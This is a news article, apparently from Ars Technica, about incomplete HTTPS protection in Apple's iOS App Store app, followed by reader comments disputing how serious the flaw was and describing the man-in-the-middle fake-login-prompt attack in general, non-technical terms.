For the past nine months—and possibly for years—Apple has unnecessarily left many of its iOS customers open to attack because engineers failed to implement standard technology that encrypts all traffic traveling between handsets and the company's App Store.

While HTTPS-encrypted communications have been used for years to prevent attackers from intercepting and manipulating sensitive traffic sent by online banks and merchants, the native iOS app that connects to Apple's App Store fully deployed the protection only recently. Elie Bursztein, a Google researcher who said he discovered the security hole in his spare time, said in a blog post published on Friday that he reported various iOS flaws to Apple's security team in July. His post gave no indication that the iOS app had ever fully used HTTPS, raising the possibility that this significant omission has been present for years. (Apple doesn't comment on security matters, so it's impossible for Ars to confirm the precise timeline or level of protection.)

As most Ars readers know, HTTPS is a basic security measure that's almost as old as the Web itself. It ensures that traffic traveling between an end-user and a webserver is encrypted. That prevents anyone who may have a connection between the two endpoints from listening in. HTTPS also provides cryptographic assurance that the server answering calls to itunes.apple.com truly belongs to Apple and not an impostor. Over the past five years, a growing roster of companies including Google, Facebook, and Twitter have begun offering end-to-end HTTPS, making it harder for attackers to use age-old exploits that bypass the measure. It's unclear why it has taken Apple so long to catch up.

Apple's failure to fully offer HTTPS for customers using their iOS app posed an unnecessary risk to anyone who has ever used their iPhone or iPad to download an app over an unsecured Wi-Fi connection. Attackers connected to the same network could use a variety of freely available tools and a clever social-engineering trick to retrieve passwords or other log-in credentials. Worse, they could set up fake App Stores that would issue fake apps and upgrades instead of the ones that would normally be issued by Apple's legitimate store.

At various points in Bursztein's post, which was headlined Apple finally turns HTTPS on for the App Store, fixing a lot of vulnerabilities, he said Apple recently "turned on HTTPS for the App Store." But later, he wrote: "By abusing the lack of encryption (HTTPS) in certain parts of the communication with the App Store, the dynamic nature of the App Store pages, and the lack of confirmation, an active network attacker can perform" various attacks. That last statement suggests that parts of the App Store were protected by HTTPS while other parts were not. Bursztein has produced several videos that demonstrate the types of damage malicious hackers could have inflicted. The one below shows how an attacker on the same unsecured network as victims could have tricked them into installing a fake upgrade.

iOS App Store fake upgrade attack.

Paul Ducklin, a researcher at antivirus provider Sophos, has more here on why HTTPS protection for the App Store is crucial.

It's great that Apple has finally updated its iOS app for App Store to provide this basic protection for the entire site. But the work isn't over yet. SSL Labs, a report card system from security firm Qualys that rates the quality of websites' HTTPS protections, gives Apple's App Store a failing grade. iOS users shouldn't worry too much, since the weaknesses Qualys is detecting aren't easy for the average hacker to exploit. Still, it shows Apple engineers still have work to do to make its customers safe.

Story updated to change headline and first and second paragraph to add the words "fully" and "all." Language was also added to leave open the possibility that parts of the App Store were already HTTPS protected. Second and third paragraphs updated to change "protect" to "prevent" and add "almost" respectively.

I find this really hard to believe. Using OpenSSL or GnuTLS is not that difficult, which kind of people are hired at those big companies? (it springs to my mind the hack that the PlayStation Network faced on 2011)

Edit: the wording of the article was updated to largely obviate this comment

This article (probably because the original disclosure did not strongly emphasize this point) makes it sound like there was no HTTPS whatsoever... rather only the "critical" parts were, which weakens the purpose of HTTPS significantly. I'd bet you a dollar a bean counter looked at a risk assessment and said HTTPS was too expensive to implement for every resource rendered. Now researchers not beholden to their corporate secrecy raise a fuss and embarrass them and now they change.

As the original disclosure mentions in passing a few times, it's only some parts that are plaintext, but they are parts that, when maliciously replaced, can dramatically affect the application.

So, what malicious software might be installed due to this failure? It is really bad that the Apple Password is sent in plaintext (Update: Nothing of the sort happens). Anybody could nick my backup dump from an iOS device, take control of my @iCloud mail account (what sucker uses that anyway?), or wipe my devices.

I also don't love how iTunes links open up a floating window over other apps (such as RSS readers), instead of punting over to the proper app. That's an easy UI for a website to fake, and bam my password is captured.

So the bug was fixed some time ago, no one was harmed, and you still complain about it for ad money.

Sure they do. It's the only thing you can say against Apple on the security side while Android had hundreds of security threats.

They won't tell you that a 0-day security hole on iOS is so hard to get that it's worthing 500 000$ on the security market like Charlie Miller did last week ...

Yesterday my friend was shocked to learn that you can do absolutely nothing to an ios device, security wise, without jailbreaking it. Needless to say, he is a supporter of "openness". +1 to your point.

This article implies that this attack enables password sniffing and malicious app installs.

Password sniffing is not necessarily possible, as it is not shown that passwords are sent in plaintext.

That's correct password sniffing is not necessarily possible. The attacker would have to convince the device to connect to a fake appstore first (e.g., via dns spoofing) which can then launch a social engineering attack to make the user divolge her password. It's bad that this is possible, but not as bad as the article or the headline suggests.--m

What they did not do is use HTTPS for all data in and out of the app. This meant that with a MITM attack it was possible to show a fake login prompt using a different mechanism (notifications) and socially engineer the user into entering their password.

This was a failing on Apple's part.

However, you show the picture above and hint, below, that the app "never used HTTPS"

Quote:

His post gave no indication that the iOS app had ever used HTTPS, raising the possibility that this significant omission has been present for years.

This is simply not the case. The photo linked above is an image showing a fake login prompt, not actually an "ownable" real iOS App Store login dialog.

Your passwords sent through the App Store were protected. However, if a smart hijacker ran an incredibly sophisticated targeted attack to your particular device, it was possible for that attacked to try and trick you into entering your password by injecting resources to create a fake login dialog.

This has been patched already.

In the meantime arstechnica.com continues to send your login info in the clear. This seems like a bit of hypocrisy.

Passwords are _not_ being sent over plaintext, though you couldn't tell from this poorly written article. It's not as bad as the way Ars sends plaintext passwords, as XolotlLoki pointed out.

Passwords can be exfiltrated though, by intercepting content coming from the app store and inserting dynamic code that prompts the user to enter their credentials and sending it out via a javascript url inclusion. Elie explains the process well in the blog post:http://elie.im/blog/web/apple-finally-t ... TuSE-tAQnn

SSL connections would prevent this hack, but so would just not executing arbitrary javascript coming from the App Store. There are ways to design more secure systems than this without wrapping absolutely everything in SSL.

The article has been updated to make clear that the unnecessary risk posed to iOS users was the result of *incomplete* HTTPS protection for the App Store. For the record, Bursztein's blog post is headlined "Apple finally turns HTTPS on for the App Store, fixing a lot of vulnerabilities," and in the first paragraph it states "Last week Apple finally issued a fix for it and turned on HTTPS for the App Store."

Later in the article, Burszstein goes on to say "By abusing the lack of encryption (HTTPS) in *certain parts* of the communication with the App Store, the dynamic nature of the App Store pages, and the lack of confirmation, an active network attaqcker can perform the following attacks:" [emphasis mine] It goes on to include password stealing, app swapping, app fake updade, preventing application installation, and privacy leak.

While the researcher doesn't specifically say so, this all but assures that parts of the App Store were previously protected by HTTPS.

My sincere apologies that this post wasn't clear on this point. The bottom line remains: For months or years some iOS users have been unnecessarily exposed to risk because Apple didn't implement industry-standard protections in the App Store.

Dan, it seems like your "correction" or "clarification" is based entirely on the original article/blog you are reporting on.

The article you are reporting on in theory should not be the only source of your information. And if we're going to be completely honest about full disclosure, the original article you are reporting on was written by an employee of a competitor of Apple.

Now, I think that researchers are probably motivated by academic concerns, but if you published an article that said "Microsoft Researchers show Google is insecure" it might make sense to take a look at the motivations behind those researchers' paychecks. And perhaps do a bit of research beyond just reading the headline and first sentence of their blog post.

Google is a direct competitor to Apple. You may hate Apple, love Apple, or feel indifferent, but you have to acknowledge the two companies have a vested interest in making each others' mobile application/store platforms look bad.

And in this case the original lede of your article was misleading. If the blog post you based the article on was equally misleading, I'm not sure that's a good excuse.

The article you are reporting on in theory should not be the only source of your information. And if we're going to be completely honest about full disclosure, the original article you are reporting on was written by an employee of a competitor of Apple.

the lack of clarity in the original Ars writeup was made possible because of Apple's refusal to comment on security issues. the corrected Ars article carefully separates conjecture from fact. readers were correct to point this out.

however, writing an article based on a "sole source" is fine--particularly when the subject of that source article (i.e. Apple) has validated the source's primary claim and when that source is able to demonstrate (i.e. through testing) that their claim has merit.

For the past nine months—and possibly for years—Apple has unnecessarily left many of its iOS customers open to attack because engineers failed to implement standard technology that encrypts all traffic traveling between handsets and the company's App Store.

Do you really think those weasel words remove the impression that credentials are being sent in plain text?

Here, let me fix that for you.

"Apple enables HTTPS for all App Store data exchanges

Unlike Ars, which sends your password completely unsecured, Apple has always used HTTPS to protect user accounts, passwords, and monetary transactions. However, some data exchanges, such as those that occur when the user is browsing the store looking at the descriptions of apps they do not yet have, were not encrypted. This will now change with Apple turning on HTTPS for every possible data exchange with the App Store."

Instead of seeing the previous "insecure" implementation as a threat, I see a possibility: set up your own "App Store", install any app you like without jailbreaking...

I should also point out, like I often do on articles with FUD about other OSes, that in case no one got hurt we can't really claim that there was any security flaw in Apple's previous implementation. With such a widespread OS, if there was ANY real danger whatsoever, we would have heard about at least some people getting scammed, hacked, etc. Since we have never heard a single report or testimonial from a single person, we can assume that the exploit was either too difficult to use or too obscure to discover, and that it didn't really matter (or maybe didn't really exist).

You cannot install "fake" updates to an app unless they are encrypted with private keys that are generally well protected.

He says "some" parts of the store are encrypted. I'm willing to bet the encrypted parts are everything that needs to be encrypted, such as your password and credit card details.

Until someone proves otherwise, I'm going to assume everything that needs SSL has it, and everything that doesn't need SSL (such as the executable code you download from the store) does not have it.

The encryption system built into binary code on iOS is very similar to SSL and just as strong. If you can break that (such as by accessing the private keys, or if the user has jailbroken their device) then you can also break SSL (which is not perfect).

Editors should have pulled this article. It is an embarrassment for Ars.Inserting a couple of qualifying words "full" and "all" in a few places does not undo the overall slant of the article, which is to imply much more danger than truly exists.

Re-reading the article after the comments is an eye-opener.Dan, you should re-write this from scratch.

You cannot install "fake" updates to an app unless they are encrypted with private keys that are generally well protected.

He says "some" parts of the store are encrypted. I'm willing to bet the encrypted parts are everything that needs to be encrypted, such as your password and credit card details.

No, there used to be a real vulnerability here.

The App Store application can be basically thought of as a web browser. It shows content.

It turns out that through a MITM attack it was possible to capture the traffic between the App Store application and the actual App Store server. You couldn't capture any HTTPS traffic like usernames, passwords, etc, but you could add your own content.

Adding your own content is an exploit of HTTPS/SSL connections going the other way from what people usually think of. You're not capturing the user's traffic, you're adding in extra content from the server, that is not actually real content.

This sort of MITM attack can be thought of as similar to a cross site scripting vulnerability, in a lot of ways.

The Google researcher hooked up a server to the iPad, and injected his own javascript code into the traffic for the landing page of the App Store application. This popped up a dialog of his choosing.

The javascript dialog could ask for anything - social security number, hair color, weight, height, but in this case the researcher made it look similar (though not identical) to the password dialog, and asked for the user's password.

If the user typed their password into this injected javascript dialog box (again, think about a web browser), it would send that password to the MITM server.

This kind of attack is partly because the App Store application wasn't using SSL for the page content to verify it was coming from the right server, and partly because the App Store application lets you execute arbitrary javascript (this probably is not necessary and might be removed as an unnecessary feature of this "browser").

There are other "attacks" possible or ways to screw things up by injecting content into the App Store. However, unlike the password javascript dialog, most would simply cause crashing, buggy behavior, or just go away completely the next time the user opened the App Store attack (without the MITM server).

Critically, you have to own the wifi connection or have a MITM server, identify the App Store traffic and devices, and control everything in the chain for this to work. Also, it seems like originally there was no way to get the App Store account name (unless you popped up another javascript dialog asking for that info). So you'd have a password but no username.

It was a real vulnerability, Apple fixed it, but it wasn't anything like the article originally suggested (which was cleartext username/password transmission).

The App Store application can be basically thought of as a web browser. It shows content.

It turns out that through a MITM attack it was possible to capture the traffic between the App Store application and the actual App Store server. You couldn't capture any HTTPS traffic like usernames, passwords, etc, but you could add your own content.

Just like you could add content to pretty much any other website anybody visits via the same technique. Just because it's the app store instead of arstechnica.com doesn't make any difference.

The Ugly wrote:

The Google researcher hooked up a server to the iPad, and injected his own javascript code into the traffic for the landing page of the App Store application. This popped up a dialog of his choosing.

The javascript dialog could ask for anything - social security number, hair color, weight, height, but in this case the researcher made it look similar (though not identical) to the password dialog, and asked for the user's password.

If the user typed their password into this injected javascript dialog box (again, think about a web browser), it would send that password to the MITM server.

Not think "like" a web browser, it is a web browser. Always has been. You could do the same thing at arstechnica.com.

The Ugly wrote:

This kind of attack is partly because the App Store application wasn't using SSL for the page content to verify it was coming from the right server, and partly because the App Store application lets you execute arbitrary javascript (this probably is not necessary and might be removed as an unnecessary feature of this "browser").

I understand that. I've been writing software professionally for a decade and virtually everything I've ever written involves the web or iOS.

The Ugly wrote:

It was a real vulnerability, Apple fixed it, but it wasn't anything like the article originally suggested (which was cleartext username/password transmission).

The article also suggested you could distribute malware, which was never true. That's what I was mostly referring to and why I think this article should see judicious use of the <strike> tag and a follow up apology written by someone who actually knows what they're talking about.

It's nice that they switched to SSL, everybody should be using SSL. But the industry standard is not to use SSL and Apple is simply doing the same as everyone else in the world.

Having read the article, and the comments so far, I have to agree that this article is poorly written - even after the edits. The two images, one showing a password that says "owned" and the other of a fake app update, implicitly lead me to think that this exploit would allow someone to "own" my iOS device and instal any software on it*. I don't see either of these being possible. The risks of giving up my password to a social engineered MTM attack is not inconsequential, but nowhere close to the overly dramatic and grossly misleading images and story. I will credit the commentators for mostly being informative and well thought and written. Thank you all for the constructive dialog, it makes me want to return to Ars - unlike the article. The article should be completely rewritten.

* Though it might be possible for someone to install an app there is no indication that it would have the signatures needed to run, so this attack at most would render an app inoperable.